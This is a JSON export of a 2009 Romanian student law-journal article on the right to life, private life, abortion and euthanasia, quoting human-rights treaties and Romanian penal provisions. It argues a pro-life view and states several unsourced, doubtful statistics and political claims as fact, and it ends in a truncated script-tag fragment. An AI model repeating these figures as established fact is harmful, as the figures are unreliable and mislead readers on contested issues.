{"id":216,"date":"2009-11-22T16:34:01","date_gmt":"2009-11-22T14:34:01","guid":{"rendered":"http:\/\/aafdutm.ro\/revista\/?p=216"},"modified":"2009-12-17T04:24:29","modified_gmt":"2009-12-17T02:24:29","slug":"via%c8%9ba-privata-inlatura-caracterul-absolut-al-exercitarii-dreptului-la-via%c8%9ba","status":"publish","type":"post","link":"https:\/\/www.aafdutm.ro\/revista\/anul-i\/nr-1\/via%c8%9ba-privata-inlatura-caracterul-absolut-al-exercitarii-dreptului-la-via%c8%9ba\/","title":{"rendered":"Via\u021ba privat\u0103 \u00eenl\u0103tur\u0103 caracterul absolut al exercit\u0103rii dreptului la via\u021b\u0103?"},"content":{"rendered":"<p style=\"text-align: justify;\"><span style=\"color: #000000;\">Drepturile fundamentale ale omului au o rezonan\u0163\u0103 absolut\u0103 \u015fi esen\u0163ial\u0103 at\u00e2t\u00a0 din perspectiva normelor juridice din dreptul intern, c\u00e2t \u015fi interna\u0163ional.\u00a0\u00a0 Din perspectiv\u0103 interna\u0163ional\u0103, drepturile omului, \u00een spe\u0163\u0103, dreptul la via\u0163\u0103 \u015fi dreptul la via\u0163\u0103 privat\u0103, \u00ee\u015fi g\u0103sesc consacrarea \u00een Declara\u0163ia Universal\u0103 a Drepturilor Omului (introdus\u0103 \u00een legisla\u0163ia rom\u00e2n\u0103 prin Legea nr. 30 din 18 mai 1994, c\u00e2t \u015fi \u00een Pactul Interna\u0163ional cu privire la drepturile civile \u015fi politice \u015fi \u00een Cartea Na\u0163iunilor Unite).<br \/>\nAceste principii universal recunoscute \u00een planul spectrului interna\u0163ional \u00ee\u015fi g\u0103sesc reglementarea de principiu \u00een Constitu\u0163ia Rom\u00e2n\u0103 \u00een art. 22 \u015fi art. 26.<br \/>\nPornind de la perspectiva interna\u0163ional\u0103 ce reglementeaz\u0103 drepturile omului \u00een Preambulul Declara\u0163iei Universale a Drepturilor Omului, se statueaz\u0103 expres c\u0103: \u201cRecunoa\u015fterea demnit\u0103\u0163ii inerente tuturor membrilor familiei umane \u015fi a drepturilor lor egale \u015fi inalienabile constituie fundamentul libert\u0103\u0163ii, drept\u0103\u0163ii \u015fi p\u0103cii \u00een lume, iar ignorarea \u015fi dispre\u0163uirea drepturilor omului au condus la acte de barbarie care revolt\u0103 con\u015ftiin\u0163a omenirii \u015fi c\u0103 f\u0103urirea unei lumi \u00een care fiin\u0163ele umane vor beneficia de libertatea cuv\u00e2ntului \u015fi a convingerilor, eliberate de teroare \u015fi de mizerie, a fost proclamat\u0103 drept cea mai \u00eenalt\u0103 aspira\u0163ie a omului.\u201d<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">De asemenea, \u00een cuprinsul Pactului Interna\u0163ional cu privire la drepturile\u00a0 civile \u0219i politice se prevede la art. 6, Partea a III-a, urm\u0103toarele:<br \/>\n\u201c1. Dreptul la via\u0163\u0103 este inerent persoanei umane.<br \/>\nAcest drept trebuie ocrotit prin lege. Nimeni nu poate fi privat de via\u0163\u0103 sa \u00een mod arbitrar.<br \/>\n2. \u00cen \u0163\u0103rile \u00een care pedeapsa cu moartea nu a fost abolit\u0103, o sentin\u0163\u0103 de condamnare la moarte nu va putea fi pronun\u0163at\u0103 dec\u00e2t pentru crimele cele mai grave, \u00een conformitate cu legisla\u0163ia \u00een vigoare, \u00een momentul \u00een care crima a fost comis\u0103, legisla\u0163ie care nu trebuie s\u0103 fie \u00een contradic\u0163ie cu dispozi\u0163iile prezentului Pact \u015fi nici cu cele ale Conven\u0163iei pentru prevenirea \u015fi reprimarea crimei de genocid.<br \/>\nAceast\u0103 pedeaps\u0103 nu poate fi aplicat\u0103 dec\u00e2t \u00een virtutea unei hot\u0103r\u00e2ri definitive pronun\u0163ate de un tribunal competent.<br \/>\n3. C\u00e2nd privarea de via\u021b\u0103 constituie crim\u0103 de genocid, se \u00een\u0163elege c\u0103 nici o dispozi\u0163ie din prezentul articol nu autorizeaz\u0103 un stat parte la prezentul Pact s\u0103 deroge \u00een vreun fel obliga\u0163ie asumat\u0103 \u00een virtutea dispozi\u0163iilor Conven\u0163iei pentru prevenirea si reprimarea crimei de genocid.<br \/>\n4. Orice condamnat la moarte are dreptul de a solicita gra\u0163ierea sau comutarea pedepsei. Amnistia, gra\u0163ierea sau comutarea pedepsei cu moartea pot fi acordate \u00een toate cazurile.\u201d<br \/>\nAbordat din diferite unghiuri de vedere, conceptul Drepturilor omului este\u00a0 receptat de comunit\u0103\u0163ile umane \u015fi de c\u0103tre fiecare membru al acestora ca o institu\u0163ie fireasc\u0103, care \u00eeng\u0103duie:<br \/>\na. \u00een\u0163elegerea mai complet\u0103 \u015fi mai exact\u0103 a statutului fiin\u0163ei umane \u00een cele mai diferite ipostaze ale sale;<br \/>\nb. cunoa\u015fterea mijloacelor politice, juridice, sociale \u015fi economice necesare pentru respectarea acestui statut;<br \/>\nc. garantarea \u00eemplinirii cerin\u0163elor implicate de acest statut prin m\u0103suri adecvate de pedepsire a celor vinova\u0163i de \u00eenc\u0103lcarea drepturilor \u0219i libert\u0103\u0163ilor inerente tuturor oamenilor.<br \/>\nMajoritatea constitu\u0163iilor prev\u0103d expres dreptul la via\u0163\u0103. \u00centr-o accep\u0163iune restr\u00e2ns\u0103, dreptul la via\u0163\u0103 prive\u015fte via\u0163a persoanei numai \u00een sensul ei fizic. \u00centr-o accep\u0163iune mai larg\u0103, dreptul la via\u0163\u0103 prive\u015fte via\u0163a ca un univers de fenomene, fapte, cerin\u0163e ce se adaug\u0103, permit \u015fi \u00eembog\u0103\u0163esc existen\u0163a fizic\u0103.<br \/>\nA\u015fa fiind, este important de ar\u0103tat c\u0103 nici art. 2 din Conven\u0163ia European\u0103 a\u00a0 drepturilor omului, care enun\u0163\u0103 acest drept (1. Dreptul la via\u0163\u0103 al oric\u0103rei persoane este protejat de lege. Moartea nu poate fi cauzat\u0103 cuiva \u00een mod inten\u0163ionat, dec\u00e2t \u00een executarea unei sentin\u0163e capitale pronun\u0163ate de un tribunal \u00een cazul c\u00e2nd infrac\u0163iunea este sanc\u0163ionat\u0103 cu aceast\u0103 pedeaps\u0103 prin lege.<br \/>\n2. Moartea nu este considerat\u0103 ca fiind cauzat\u0103 cu \u00eenc\u0103lcarea acestui articol, \u00een cazul c\u00e2nd ea ar rezulta din recurgerea la for\u0163a dovedit\u0103 absolut necesar\u0103:<br \/>\na) pentru a asigura ap\u0103rarea oric\u0103rei persoane \u00eempotriva violen\u0163ei nelegale;<br \/>\nb) pentru a efectua o arestare legal\u0103 sau pentru a \u00eempiedica evadarea unei persoane legal de\u0163inute;<br \/>\nc) pentru a reprima, conform legii, o revolt\u0103 sau o insurec\u0163ie), nici Protocolul nr. 6, care impune abolirea pedepsei cu moartea, nu au \u00een vedere s\u0103 protejeze \u00een mod necondi\u0163ionat via\u0163a \u00eens\u0103\u015fi sau s\u0103 garanteze o anumit\u0103 calitate a vie\u0163ii.<br \/>\nAceste dispozi\u0163ii urm\u0103resc s\u0103 protejeze, mai cur\u00e2nd, individul, \u00eempotriva oric\u0103rei suprim\u0103ri a vie\u0163ii impuse arbitrar de c\u0103tre Stat.<br \/>\nTermenul \u201cdrepturi\u201d a devenit deja elementul unui limbaj ambiguu, care domin\u0103 dezbaterile politice \u00een foarte multe \u0163\u0103ri. \u00cen loc s\u0103 vorbim despre datorii \u015fi responsabilit\u0103\u0163i, vorbim peste tot numai despre drepturi. Suntem pur \u015fi simplu obseda\u0163i de drepturi. Datoria noastr\u0103 fa\u0163\u0103 de copii, prin contrast, se vede atunci c\u00e2nd ace\u015ftia sunt exploata\u0163i, trafica\u0163i, maltrata\u0163i, c\u00e2nd via\u0163a copilului nen\u0103scut este distrus\u0103. Dac\u0103 neglijezi dreptul la via\u0163\u0103 \u00een sine, celelalte drepturi devin inutile. Dreptul la via\u0163\u0103 de la concep\u0163ie este un drept suprem. De\u015fi este men\u0163ionat \u00een Carta Drepturilor Omului a Na\u0163iunilor Unite, acest principiu nu este respectat. Ar fi mai bine ca accentul dezbaterilor s\u0103 se mute de pe drepturi, pe datorii \u015fi obliga\u0163ii. Acest lucru va ajuta foarte mult la protejarea vie\u0163ii copiilor nen\u0103scu\u0163i.<br \/>\nPoate c\u0103 avortul nu ar fi o problem\u0103 care s\u0103 fie decis\u0103 de institu\u0163iile Uniunii Europene, ci de c\u0103tre fiecare parlament \u00een parte, \u00eens\u0103 apare problema c\u0103 \u0163\u0103rile se influen\u0163eaz\u0103 una pe alta.<br \/>\nSpre exemplu, Olanda, care din 2002 a devenit prima \u0163ar\u0103 care a legalizat sinuciderea asistat\u0103 (eutanasierea), ca metod\u0103 de curmare a suferin\u0163elor pentru pacien\u0163ii cu boli incurabile, iar la scurt timp, Belgia i-a urmat exemplul, apoi Luxemburg \u015fi \u00eentr-o form\u0103 mai strict\u0103 Suedia \u015fi Elve\u0163ia.\u00a0 \u00cen Olanda este permis\u0103 acum \u015fi eutanasierea copiilor sub v\u00e2rsta de 12 ani. Dup\u0103 legisla\u0163ia Rom\u00e2niei, eutanasierea uman\u0103 este interzis\u0103, \u00eens\u0103 nu vom \u015fti niciodat\u0103 ce se va \u00eent\u00e2mpla. O problem\u0103 important\u0103 care ne preocup\u0103 este cea referitoare la avort. Este dilema etic\u0103 cea mai controversat\u0103 creat\u0103 de tehnologiile de reproducere \u00een societ\u0103\u0163ile moderne. \u00cen Europa, ca oriunde, problemele referitoare la avort au constituit adesea obiect al polemicii, c\u0103ci ele sunt la fel de str\u00e2ns legate de moral\u0103, de politic\u0103, de religie \u015fi de s\u0103n\u0103tate,\u00a0 ca \u015fi de drept.<br \/>\nCurtea European\u0103 a Drepturilor Omului nu a fost \u00eens\u0103 sesizat\u0103 cu cauze de avort; dimpotriv\u0103, \u00een ceea ce prive\u015fte Comisia European\u0103, a recunoa\u015fte unui fetus dreptul absolut la via\u0163\u0103 ar fi contra obiectului \u015fi scopului Conven\u0163iei (cer. nr. 8416\/78).<br \/>\nPe 16 aprilie 2008, la Strasburg, Adunarea Parlamentar\u0103 a Consiliului Europei (PACE) a adoptat o Rezolu\u0163ie prin care toate \u0163\u0103rile membre sunt \u00eendemnate s\u0103 asigure accesul la avortul legal, precum \u015fi educa\u0163ia sexual\u0103 obligatorie pentru tineri.<br \/>\nAdunarea a votat Rezolu\u0163ia 1607\/2008 cu 102 voturi pentru, 69 \u00eempotriv\u0103 \u015fi 14 ab\u0163ineri. Doar 185 dintre cei 318 membri ai PACE au fost prezen\u0163i la vot. Adunarea Parlamentar\u0103 a Consiliului Europei, cea mai veche dintre organiza\u0163iile unionale, cuprinde reprezentan\u0163i din 47 de \u0163\u0103ri europene din U.E. \u015fi din afara acesteia. Deciziile sale au caracter de recomandare \u015fi nu sunt obligatorii pentru statele membre, dar sunt destul de influente \u00een alte organisme, cum ar fi Curtea European\u0103 a Drepturilor Omului.<br \/>\nComisia a apreciat totu\u015fi c\u0103 Statul poate impune unele limit\u0103ri dreptului la avort, f\u0103r\u0103 ca prin aceasta s\u0103 aduc\u0103 atingere dreptului la via\u0163a privat\u0103, garantat femeilor \u00eens\u0103rcinate de art. 8 (Bruggemann \u015fi Schenten, Rap. Com. din 1977).<br \/>\nDezbaterea legat\u0103 de avort a devenit at\u00e2t de aprins\u0103 tocmai din pricina faptului c\u0103 ea este centrat\u0103 pe aspectele etice fundamentale la care nu se g\u0103sesc cu u\u015furin\u0163\u0103 solu\u0163ii. Cei care sunt \u201cpro via\u0163\u0103\u201d consider\u0103 c\u0103 avortul este un p\u0103cat, cu excep\u0163ia \u00eemprejur\u0103rilor c\u00e2nd acesta este necesar, pentru c\u0103 este echivalentul crimei. Pentru ei aspectele etice sunt mai presus de orice, subsumate valori care trebuie acordate vie\u0163ii umane.<br \/>\nCei care sunt: \u201cpro alegere\u201d sus\u0163in c\u0103 cel mai important considerent trebuie s\u0103 fie controlul mamei asupra propiului corp.<br \/>\nSub aspect moral, problematica avortului a devenit un fapt mai mult dec\u00e2t banal. O femeie din dou\u0103 are \u00een palmares de la trei, p\u00e2n\u0103 la cinci avorturi la cerere \u015fi, \u00eentr-un mod foarte dureros, anumite statistici, arat\u0103 faptul c\u0103 un procent de 18% din avorturi sunt cerute de adoloscente \u00eentre 15 \u015fi 19 ani, iar 60% au v\u00e2rsta \u00eentre 19 \u015fi 24 ani.<br \/>\nDe asemenea, se constat\u0103 c\u0103 v\u00e2rsta medie a elevelor care recurg la avort a sc\u0103zut \u00een ultima perioad\u0103 de la 17 \u2013 18 ani, la 15 \u2013 16 ani, multe recurg\u00e2nd la aceast\u0103 interven\u0163ie chiar sub v\u00e2rsta de 14 ani.<br \/>\nNu este de mirare c\u0103 \u201cpruncuciderea\u201d din cabinetele medicale a ajuns \u00een strad\u0103.<br \/>\nDecretul nr. 463\/1957 al regimului Gh. Gheorghiu-Dej liberalizeaz\u0103, dup\u0103\u00a0 modelul sovietic, pentru prima dat\u0103, avortul, cu consecin\u0163e dintre cele mai dezastruoase asupra echilibrului social economic \u0219i demografic al \u0163\u0103rii.<br \/>\nUn al doilea decret care a adus modific\u0103ri institu\u0163iei avortului \u00een Rom\u00e2nia este Decretul nr. 770\/1966.<br \/>\nExperien\u0163a anilor 1957 \u2013 1966 a ar\u0103tat faptul c\u0103 prin legalizarea avorturilor a crescut num\u0103rul acestora \u015fi, consecutiv, s-au produs efecte demografice negative.<br \/>\n\u00cen aceste condi\u0163ii, se emite Decretul nr. 770 din 29 septembrie 1966, schimb\u00e2ndu-se totodat\u0103 \u015fi dispozi\u0163iile Codului penal referitoare la avort.<br \/>\nDecretul nr. 770\/1966 permitea avortul terapeutic efectuat \u00een primele trei luni de sarcin\u0103, pe baza unor stricte indica\u0163ii medicale, \u015fi numai cu totul \u015fi cu totul excep\u0163ional accepta sacrificarea produsului de concep\u0163ie \u015fi p\u00e2n\u0103 la 6 luni.<br \/>\n\u00cen ciuda prevederilor drastice din Decretul nr.\u00a0 770\/1966, scopurile urm\u0103rite nu au fost realizate.<br \/>\nEste drept c\u0103, pentru un scurt interval de la aplicarea sa, s-a constatat o u\u015foar\u0103 ameliorare a natalit\u0103\u0163ii, care \u00eens\u0103 nu a fost consecin\u0163a faptului c\u0103 sistemul ilicit de practicare a avorturilor delictuale nu fusese puse \u00een func\u0163iune.<br \/>\nFaptul c\u0103 promulgarea acestui decret nu s-a asociat cu o \u00eembun\u0103t\u0103\u0163ire corespunz\u0103toare a condi\u0163iilor socio-economice a dus la o sc\u0103dere a natalit\u0103\u0163ii \u015fi mai pronun\u0163at\u0103, pe l\u00e2ng\u0103 faptul c\u0103 poten\u0163ialul biologic al femeilor apte de a fi \u00eens\u0103rcinate a sc\u0103zut \u00een urma deceselor post-avort, c\u00e2t \u015fi a sechelelor determinate de multiplele interven\u0163ii de avort. \u00cen loc ca aceast\u0103 situa\u0163ie, cu multiple implica\u0163ii pe care aceasta le avea pe plan na\u0163ional, s\u0103 fie temeinic analizat\u0103 pentru a rezulta o \u00eembun\u0103t\u0103\u0163ire a condi\u0163iilor socio-economice, s-a promulgat un al treilea decret, ale c\u0103rui restric\u0163ii au dep\u0103\u015fit cu mult cele anterioare, \u0219i anume Decretul nr. 441 din 26 decembrie 1985.<br \/>\nUn al patrulea decret, \u015fi printre primele m\u0103suri luate de c\u0103tre C.P.U.N. dup\u0103 Revolu\u0163ia din decembrie 1989, a fost Decretul-lege, care abroga Decretul nr. 770\/1966 \u015fi 441\/1985 \u015fi art. 185-188 din Codul penal privind avortul.<br \/>\nPrin Decretul-lege nr. 1 din 26 decembrie 1989, avortul este permis \u00een primele 3 luni de sarcin\u0103, numai \u00een unit\u0103\u0163i spitalice\u015fti cu dotare \u015fi cu personal A.T.I., \u015fi ca situa\u0163ii de excep\u0163ie incestul \u0219i violul.<br \/>\nUlterior adopt\u0103ri acestui act normativ, \u00eens\u0103, s-a observat c\u0103 foarte multe \u00eentreruperi de sarcin\u0103 s-au efectuat \u00een afara institu\u0163iilor medicale de specialitate, de c\u0103tre persoane care nu aveau nici o preg\u0103tire \u00een acest sens.\u00a0 Ca urmare a acestui fapt, Art. 185 din Codul penal, care prive\u015fte provocarea ilegal\u0103 a avortului, a fost reintrodus, dup\u0103 ce fusese ini\u0163ial abrogat prin Decretul-lege, cu un nou con\u0163inut, prin Legea nr. 140\/1996. Astfel, din punct de vedere medical, este constatat \u015ftiin\u0163ific c\u0103 fiin\u0163a uman\u0103 \u00ee\u015fi \u00eencepe existen\u0163a o dat\u0103 cu fecundarea. Deja mult\u0103 vreme embrionii umani \u015fi fe\u0163ii sunt considera\u0163i \u201cpacien\u0163i\u201d, c\u0103rora li se asigur\u0103 asisten\u0163\u0103 medical\u0103 potrivit posibilit\u0103\u0163ilor de ast\u0103zi ale medicinii.<br \/>\n\u201cVoi p\u0103stra respect absolut vie\u0163ii, de la \u00eenceputul ei\u201d se afirma \u00een Jur\u0103m\u00e2ntul de la Geneva al Asocia\u0163iei Medicale Nationale, 1983.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">Din punct de vedere cre\u015ftin, avortul \u00eencalc\u0103 una dintre cele 10 porunci:\u00a0 \u201cS\u0103 nu ucizi.\u201d<br \/>\nSe vede cu ochiul liber c\u0103 educ\u0103m iubirea de pace \u015fi se creeaz\u0103 r\u0103zboi, discut\u0103m de programe de combaterea violen\u0163ei \u00een familie, dar familia este pe cale de dispari\u0163ie, discut\u0103m despre prevenirea abuzurilor de tot felul asupra minorilor, dar sunt din ce \u00een ce mai pu\u0163ini copii \u015fi mul\u0163i maltrata\u0163i.<br \/>\nNu programe educative sau informa\u0163iile ne lipsesc, ci voin\u0163a \u015fi atitudinea, orientarea \u00een problemele reale de educa\u0163ie.<br \/>\nNou\u0103, cei care pretindem c\u0103 ap\u0103r\u0103m dreptul \u015fi dreptatea, ne revine obliga\u0163ia de a \u00eendrepta aceast\u0103 stare de lucr\u0103ri. Va trebui s\u0103 g\u00e2ndim bine \u015fi s\u0103 legifer\u0103m corect pentru a schimba con\u015ftiin\u0163ele \u015fi a-i face pe oamenii no\u015ftri s\u0103 respecte via\u0163a.<br \/>\nSub aspect penal, avem prevederile actualului Cod penal, art. 185:<br \/>\n\u201c\u00centreruperea cursului de sarcin\u0103, prin mijloace, s\u0103v\u00e2r\u015fit\u0103 \u00eentr-una din urm\u0103toarele \u00eemprejur\u0103ri:<br \/>\n\u2013 \u00een afara institutelor medicale sau cabinetelor medicale autorizate \u00een acest scop;<br \/>\n\u2013 de c\u0103tre o persoan\u0103 care nu are calitatea de medic de specialitate;<br \/>\n\u2013 dac\u0103 v\u00e2rsta sarcinii a dep\u0103\u0219it 14 s\u0103pt\u0103m\u00e2ni se pedepse\u0219te cu \u00eenchisoarea de\u00a0 la 6 luni la 3 ani;<br \/>\n\u2013 s\u0103v\u00e2r\u015fit\u0103 \u00een orice condi\u0163ii, f\u0103r\u0103 consim\u0163\u0103m\u00e2ntul femeii \u00eens\u0103rcinate, se pedepse\u015fte cu \u00eenchisoarea de la 2 la 7 ani \u015fi cu interzicerea unor drepturi;<br \/>\n\u2013 dac\u0103 prin faptele prev\u0103zute la alin. 1 \u015fi 2 s-a cauzat femeii \u00eens\u0103rcinate vreo v\u0103t\u0103mare corporal\u0103 grav\u0103, pedeapsa este \u00eenchisoarea de la 3 la 10 ani \u015fi interzicerea unor drepturi;<br \/>\n\u2013 \u00een cazul c\u00e2nd fapta prev\u0103zut\u0103 \u00een alin. 2 \u015fi 3 a fost s\u0103v\u00e2r\u015fit\u0103 de medic, pe l\u00e2ng\u0103 pedeapsa cu \u00eenchisoarea, se va aplica \u015fi interdic\u0163ia exercit\u0103rii profesiei de medic.\u201d<br \/>\n\u00cen dreptul civil \u00ee\u015fi g\u0103se\u015fte aplicabilitatea prin dob\u00e2ndirea de drepturi pentru toate cele prev\u0103zute \u00een Decretul nr. 31\/1954, art. 7 alin. 2: \u201cDrepturile copilului sunt recunoscute de la concep\u0163iune, \u00eens\u0103 numai dac\u0103 el se na\u015fte viu.\u201d Excep\u0163ia este cea potrivit c\u0103reia copilul conceput se socote\u015fte n\u0103scut ori de c\u00e2te ori aceasta este \u00een interesul s\u0103u.<br \/>\nAceast\u0103 excep\u0163ie se aplic\u0103 dac\u0103 copilul se na\u015fte viu, nefiind necesar ca acesta s\u0103 fie viabil, \u015fi doar dac\u0103 dob\u00e2nde\u015fte numai drepturi.<br \/>\nLegile tuturor timpurilor au ocrotit persoana uman\u0103, sanc\u0163ion\u00e2nd pe cei care atentau la via\u0163a, integritatea corporal\u0103, s\u0103n\u0103tatea, libertatea \u015fi demnitatea omului. Problematica omului a stat din totdeauna nu numai \u00een aten\u0163ia juri\u015ftilor, ci \u015fi a filosofilor, economi\u015ftilor, politicienilor, arti\u015ftilor etc. Cu toate acestea, omul \u015fi drepturile sale n-au preocupat niciodat\u0103 mai mult omenirea ca \u00een zilele noastre.<br \/>\nAstfel, la 10 decembrie 1948, Adunarea General\u0103 a Na\u0163iunilor Unite a adoptat \u015fi proclamat \u201cdeclara\u0163ia universal\u0103 a drepturilor omului\u201d, \u00een cuprinsul c\u0103reia sunt stipulate drepturi fundamentale, ar\u0103t\u00e2ndu-se, printre altele, c\u0103: toate fiin\u0163ele umane au dreptul la via\u0163\u0103, la libertate \u015fi la securitatea persoanei sale.<br \/>\n\u00cen exercitarea drepturilor \u015fi libert\u0103\u0163ilor sale, nici un om nu este supus dec\u00e2t numai \u00eengr\u0103dirilor stabilite de lege, exclusiv \u00een scopul de a asigura cuvenita recunoa\u015ftere \u015fi respectare a drepturilor \u015fi libert\u0103\u0163ilor altora \u015fi ca s\u0103 fie satisf\u0103cute justele cerin\u0163e ale moralei, ordinii publice \u015fi bun\u0103st\u0103rii generale \u00eentr-o societate democratic\u0103.<br \/>\n\u00cen ultimii ani, \u00eendeosebi, drepturile omului au \u00eencetat s\u0103 mai fie doar un subiect extrem de dezb\u0103tut, devenind \u015fi unul dintre factorii esen\u0163iali gra\u0163ie c\u0103rora s-au produs ample muta\u0163ii \u00een fizionomia politic\u0103 \u015fi economic\u0103 a unui mare num\u0103r de \u0163\u0103ri ale lumii. Astfel, drepturile omului au devenit o surs\u0103 major\u0103 de dinamizare a evolu\u0163iei istorice ca urmare a \u00eempletirii \u015fi poten\u0163\u0103rii reciproce a c\u00e2torva tendin\u0163e. Afirmarea cresc\u00e2nd\u0103 a individului \u015fi con\u015ftientizarea faptului c\u0103 recunoa\u015fterea \u015fi protec\u0163ia drepturilor \u015fi libert\u0103\u0163ilor omului este benefic\u0103 nu numai afirm\u0103rii personalit\u0103\u0163ii indivizilor<br \/>\nca atare, ci \u015fi societ\u0103\u0163ii \u015fi, \u00eentr-un sens mai larg, umanit\u0103\u0163ii \u00een ansamblul s\u0103u, reprezint\u0103 unul din marile adev\u0103ruri ale vremurilor noastre.<br \/>\nNoile realit\u0103\u0163i existente \u00een Rom\u00e2nia dup\u0103 1989 au determinat alinierea \u0163\u0103rii noastre la standardele interna\u0163ionale \u015fi \u00een ce prive\u015fte ap\u0103rarea drepturilor omului, a persoanei umane. Victoria revolu\u0163iei rom\u00e2ne, sco\u0163\u00e2nd \u0163ara din co\u015fmarul totalitarismului, a deschis noi orizonturi, idealul drepturilor omului devenind o realitate a vie\u0163ii noatre libere, iar \u00eembog\u0103\u0163irea lui \u00een con\u0163inut o perspectiv\u0103 a viitorului acestei \u0163\u0103ri.<br \/>\nRespectarea acestor preciz\u0103ri constitu\u0163ionale este asigurat\u0103 de toate ramurile dreptului potrivit\u00a0 cu specificul lor. O contribu\u0163ie important\u0103 la asigurarea protec\u0163iei drepturilor \u015fi libert\u0103\u0163ilor omului consacrate de constitu\u0163ie o aduce \u015fi legea penal\u0103.<br \/>\nCadrul juridic menit s\u0103 dea eficien\u0163\u0103 ap\u0103r\u0103rii acestor drepturi \u015fi libert\u0103\u0163i \u00eel formeaz\u0103 Titlul II din Partea special\u0103 a Codului penal. Ap\u0103rarea persoanei umane prin dispozi\u0163iile cuprinse \u00een acest titlu prive\u015fte pe om \u00een ansamblul atribu\u0163iilor care caracterizeaz\u0103 fiin\u0163a uman\u0103 (via\u0163a, integritatea corporal\u0103, libertatea, inviolabilitatea sexual\u0103, demnitatea.)<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\"><br \/>\n<strong>Exemplu:<\/strong><\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\"><br \/>\nCodul penal german reglementeaz\u0103 infrac\u0163iunile contra vie\u0163ii \u00een Capitolul 16, unde este \u00eencriminat\u0103 uciderea unei persoane \u00een condi\u0163ii agravante (paragraful 211); \u00eentreruperea de sarcinii (paragraful 218); pruncuciderea (paragraful 217) etc. Codul penal spaniol cuprinde, de asemenea, infrac\u0163iunile contra persoanei. Astfel, \u00een Titlul VIII Cap. II Pruncuciderea (art. 410), iar \u00een Cap.III Avortul (art. 41).<br \/>\nO femeie implicat\u0103 \u00een procesul care a dus la legalizarea avortului \u00een Statele Unite, \u00een prezent, \u015fi- a schimbat total atitudinea fa\u0163\u0103 de via\u0163\u0103. Aceasta, Norma Mc. Corvey, care a lucrat \u00een clinicile de avort, a v\u0103zut ce li se poate \u00eent\u00e2mpla femeilor din cauza avortului \u015fi ce minciuni li se poate spune.<br \/>\n\u00cen Europa nu exist\u0103 aceste schimb\u0103ri de atitudini, ba dimpotriv\u0103, d-na Hillary Clinton a afirmat la Messiah College, \u00een apropiere de Harrisburg, c\u0103, \u00een Rom\u00e2nia comunist\u0103, foarte mul\u0163i copii erau abandona\u0163i \u015fi l\u0103sa\u0163i \u00een orfelinate, ceea ce a dus la o epidemie de SIDA. Ea a mai afirmat c\u0103 \u201cfiecare persoan\u0103 trebuie s\u0103 aib\u0103 dreptul s\u0103 fac\u0103 aceast\u0103 decizie major\u0103, dac\u0103 poate s\u0103 pun\u0103 cap\u0103t unei sarcini, \u015fi c\u0103 avortul trebuie s\u0103 r\u0103m\u00e2n\u0103 legal \u015fi sigur\u201d. Clinton a fost \u00een Rom\u00e2nia \u00een 1995, iar la scurt\u0103 vreme dup\u0103 o vizit\u0103 \u00een China a criticat politica copilului unic adoptat\u0103 de Guvernul de la Beijing.<br \/>\nPrimul ordin semnat de Bush atunci c\u00e2nd a venit la putere a fost acela s\u0103 redirec\u0163ioneze banii care, p\u00e2n\u0103 atunci, mergeau spre avorturile \u015fi controlul popula\u0163iei din China, s\u0103-i redirec\u0163ioneze spre alte necesit\u0103\u0163i. Administra\u0163ia Clinton a finan\u0163at timp de mul\u0163i ani politica unui singur copil, cum este \u00een China. <\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">Barack Obama a afirmat c\u0103 nu a ajuns \u00eenc\u0103 la o concluzie \u015fi c\u0103 nu cunoa\u015fte\u00a0 dac\u0103 via\u0163a \u00eencepe \u00eenc\u0103 din momentul concep\u0163iei. Ceea ce \u015ftiu este c\u0103 exist\u0103 ceva extraordinar de puternic dincolo de via\u0163a poten\u0163ial\u0103 \u015fi c\u0103 acest lucru are o greutate moral\u0103 pe care o lu\u0103m \u00een considerare \u00een momentul \u00een care avem aceste discu\u0163ii.<br \/>\nNu trebuie s\u0103 spui doar nu avorturilor, ci trebuie s\u0103 le aju\u0163i pe femeile \u00eens\u0103rcinate. E bine c\u0103 nu avem legalizat\u0103 legea eutanasierii precum Olanda, unde \u00een ultimii ani au fost omor\u00e2\u0163i peste 4 mii de oameni \u00een v\u00e2rst\u0103. Cred c\u0103 e mai important s\u0103 putem oferi alternative \u015fi s\u0103 ajut\u0103m, dec\u00e2t s\u0103 \u00eencrimin\u0103m \u015fi s\u0103 legaliz\u0103m precum al\u0163ii, pentru c\u0103 a\u015fa e la mod\u0103.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">Bibliografie<br \/>\n1. Introducere \u00een Conven\u0163ia European\u0103 a Drepturilor omului. Documente europene, Donna Gomien, Ed. All Beck, Bucure\u015fti, 1993<br \/>\n2. Genetica \/ \u00cenceput f\u0103r\u0103 sf\u00e2r\u015fit, Constantin Maximilian, Marius Bembea, Valerica Belegeanu, ed. De vest.<br \/>\n3. Principalele instrumente interna\u0163ionale privind Drepturile Omului la care Rom\u00e2nia este parte; vol.I, Instrumente universale, Bucure\u015fti, Institutul Rom\u00e2n pentru Drepturile Omului.<br \/>\n4. Dic\u0163ionar enciclopedic ilustrat, Ed. Cartier.<br \/>\n5. Sociologie, Athony Giddens, Ed. All Beck<br \/>\n6. Drept interna\u0163ional public<br \/>\n7. Declara\u0163iile Universale a Drepturilor Omului<br \/>\n8. Tratat de Teoria General\u0103 a Drepturilor, Dumitru Mazilu<br \/>\n9. Explica\u0163ii teoretice ale Codului Penal, Vintil\u0103 Dongoroz<br \/>\n10. www.un.org\/aboutun\/charter\/index.htm<br \/>\n11.http:\/\/www.provitacraiova.ro\/copii%20\u2013avortati\/index.html<br \/>\n12. http:\/\/provitabucuresti.ro\/dreptul-la-viata\/<br \/>\n13.http:\/\/legislatie.resurse-pentru-democratie.org\/legi_drepturi.php<br \/>\n14. Site BBC News<br \/>\n15. Conven\u0163ia european\u0103 a drepturilor omului, Corneliu B\u00eersan \u015fi Marius Eftimie, ed. Hamangiu, 2007<br \/>\nAlte pagini de pe internet, conferin\u0163e de pres\u0103, medicin\u0103 legal\u0103 \u015fi o dezbatere parlamentar\u0103 a domnului Gheorghe Gabor.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\"><br \/>\n<\/span><\/p>\n<p style=\"text-align: justify;\">\n<p><script>var 